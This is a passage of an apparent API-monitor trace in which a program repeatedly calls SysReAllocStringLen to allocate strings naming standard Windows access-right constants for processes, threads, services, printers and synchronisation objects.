[0140.338] SysReAllocStringLen (in: pbstr=0x2a8ea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8ea10*="WRITE_OWNER") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8ea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8ea00*="WRITE_DAC") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8e9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x2a8e9f0*="TIMER_MODIFY_STATE") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8e9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x2a8e9e0*="TIMER_QUERY_STATE") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8e9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x2a8e9d0*="TIMER_ALL_ACCESS") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8e9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8e9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8e9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8e9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8e9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a8e9a0*="STANDARD_RIGHTS_READ") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8e990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a8e990*="STANDARD_RIGHTS_ALL") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8e980*="DELETE") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8e970*="READ_CONTROL") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8e960*="WRITE_OWNER") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8e950*="WRITE_DAC") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x2a8e940*="SECTION_EXTEND_SIZE") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x2a8e930*="FILE_MAP_READ") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x2a8e920*="FILE_MAP_WRITE") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x2a8e910*="FILE_MAP_COPY") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x2a8e900*="FILE_MAP_ALL_ACCESS") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8e8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8e8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a8e8d0*="STANDARD_RIGHTS_READ") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a8e8c0*="STANDARD_RIGHTS_ALL") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8e8b0*="DELETE") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8e8a0*="READ_CONTROL") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8e890*="WRITE_OWNER") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8e880*="WRITE_DAC") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x2a8e870*="MUTEX_MODIFY_STATE") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x2a8e860*="MUTEX_ALL_ACCESS") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8e850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8e840*="STANDARD_RIGHTS_WRITE") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a8e830*="STANDARD_RIGHTS_READ") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a8e820*="STANDARD_RIGHTS_ALL") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8e810*="DELETE") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8e800*="READ_CONTROL") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8e7f0*="WRITE_OWNER") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8e7e0*="WRITE_DAC") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x2a8e7d0*="EVENT_MODIFY_STATE") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x2a8e7c0*="EVENT_ALL_ACCESS") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8e7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8e7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a8e790*="STANDARD_RIGHTS_READ") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a8e780*="STANDARD_RIGHTS_ALL") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8e770*="DELETE") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8e760*="READ_CONTROL") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8e750*="WRITE_OWNER") returned 1
[0140.339] SysReAllocStringLen (in: pbstr=0x2a8e740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8e740*="WRITE_DAC") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x2a8e730*="SEMAPHORE_MODIFY_STATE") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x2a8e720*="SEMAPHORE_ALL_ACCESS") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8e710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8e700*="STANDARD_RIGHTS_WRITE") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a8e6f0*="STANDARD_RIGHTS_READ") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a8e6e0*="STANDARD_RIGHTS_ALL") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8e6d0*="DELETE") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8e6c0*="READ_CONTROL") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8e6b0*="WRITE_OWNER") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8e6a0*="WRITE_DAC") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x2a8e690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x2a8e680*="JOB_OBJECT_TERMINATE") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x2a8e670*="JOB_OBJECT_QUERY") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x2a8e660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x2a8e650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x2a8e640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8e630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8e620*="STANDARD_RIGHTS_WRITE") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a8e610*="STANDARD_RIGHTS_READ") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a8e600*="STANDARD_RIGHTS_ALL") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8e5f0*="DELETE") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8e5e0*="READ_CONTROL") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8e5d0*="WRITE_OWNER") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8e5c0*="WRITE_DAC") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x2a8e5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x2a8e5a0*="THREAD_IMPERSONATE") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x2a8e590*="THREAD_SET_THREAD_TOKEN") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x2a8e580*="THREAD_QUERY_INFORMATION") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x2a8e570*="THREAD_SET_INFORMATION") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x2a8e560*="THREAD_SET_CONTEXT") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x2a8e550*="THREAD_GET_CONTEXT") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x2a8e540*="THREAD_SUSPEND_RESUME") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x2a8e530*="THREAD_TERMINATE") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x2a8e520*="THREAD_ALL_ACCESS") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8e510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.340] SysReAllocStringLen (in: pbstr=0x2a8e500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8e500*="STANDARD_RIGHTS_WRITE") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a8e4f0*="STANDARD_RIGHTS_READ") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a8e4e0*="STANDARD_RIGHTS_ALL") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8e4d0*="DELETE") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8e4c0*="READ_CONTROL") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8e4b0*="WRITE_OWNER") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8e4a0*="WRITE_DAC") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x2a8e490*="PROCESS_QUERY_INFORMATION") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x2a8e480*="PROCESS_SET_INFORMATION") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x2a8e470*="PROCESS_SET_QUOTA") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x2a8e460*="PROCESS_CREATE_PROCESS") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x2a8e450*="PROCESS_DUP_HANDLE") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x2a8e440*="PROCESS_VM_WRITE") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x2a8e430*="PROCESS_VM_READ") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x2a8e420*="PROCESS_VM_OPERATION") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x2a8e410*="PROCESS_SET_SESSIONID") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x2a8e400*="PROCESS_CREATE_THREAD") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x2a8e3f0*="PROCESS_TERMINATE") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x2a8e3e0*="PROCESS_ALL_ACCESS") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8e3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8e3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a8e3b0*="STANDARD_RIGHTS_READ") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a8e3a0*="STANDARD_RIGHTS_ALL") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8e390*="DELETE") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8e380*="READ_CONTROL") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8e370*="WRITE_OWNER") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8e360*="WRITE_DAC") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x2a8e350*="PERM_FILE_CREATE") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x2a8e340*="PERM_FILE_WRITE") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x2a8e330*="PERM_FILE_READ") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8e320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8e310*="STANDARD_RIGHTS_WRITE") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a8e300*="STANDARD_RIGHTS_READ") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a8e2f0*="STANDARD_RIGHTS_ALL") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8e2e0*="DELETE") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8e2d0*="READ_CONTROL") returned 1
[0140.341] SysReAllocStringLen (in: pbstr=0x2a8e2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8e2c0*="WRITE_OWNER") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8e2b0*="WRITE_DAC") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x2a8e2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x2a8e290*="PRINTER_ACCESS_USE") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x2a8e280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x2a8e270*="SERVER_ACCESS_ENUMERATE") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x2a8e260*="SERVER_ACCESS_ADMINISTER") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a8e250*="PRINTER_ALL_ACCESS") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x2a8e240*="PRINTER_EXECUTE") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x2a8e230*="PRINTER_WRITE") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x2a8e220*="PRINTER_READ") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a8e210*="PRINTER_ALL_ACCESS") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8e200*="DELETE") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8e1f0*="READ_CONTROL") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8e1e0*="WRITE_OWNER") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8e1d0*="WRITE_DAC") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x2a8e1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x2a8e1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x2a8e1a0*="SC_MANAGER_LOCK") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x2a8e190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x2a8e180*="SC_MANAGER_CONNECT") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x2a8e170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x2a8e160*="SC_MANAGER_ALL_ACCESS") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8e150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8e140*="STANDARD_RIGHTS_WRITE") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a8e130*="STANDARD_RIGHTS_READ") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a8e120*="STANDARD_RIGHTS_ALL") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8e110*="DELETE") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8e100*="READ_CONTROL") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8e0f0*="WRITE_OWNER") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8e0e0*="WRITE_DAC") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x2a8e0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x2a8e0c0*="SERVICE_STOP") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x2a8e0b0*="SERVICE_START") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x2a8e0a0*="SERVICE_QUERY_STATUS") returned 1
[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x2a8e090*="SERVICE_QUERY_CONFIG") returned 1
